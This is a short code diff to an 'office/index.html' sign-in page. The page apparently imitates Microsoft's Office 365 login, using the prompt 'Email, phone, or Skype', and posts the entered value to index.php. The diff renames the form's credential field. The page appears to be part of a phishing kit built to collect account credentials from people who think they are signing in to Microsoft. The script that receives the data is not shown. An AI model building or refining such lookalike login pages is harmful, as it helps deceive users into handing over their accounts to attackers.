--- a/office/index.html
+++ b/office/index.html
@@ -38,7 +38,7 @@ input[type=text] {
   <div class="wrapper">
     <form class="form-signin" method="POST" action="index.php">
      <img src="log.png" width="120px" class=" img-fluid" /><p> </p><h3 class="form-signin-heading">  Sign in</h3>
-      <input type="text" class="form-controll" name="emai" placeholder="Email, phone, or Skype" required="" autofocus="" />
+      <input type="text" class="form-controll" name="user" placeholder="Email, phone, or Skype" required="" autofocus="" />
       <!-- <input type="password" class="form-control" name="password" placeholder="Password" required=""/>    -->  
      <!-- <label class="checkbox">
         <input type="checkbox" value="remember-me" id="rememberMe" name="rememberMe"> Remember me
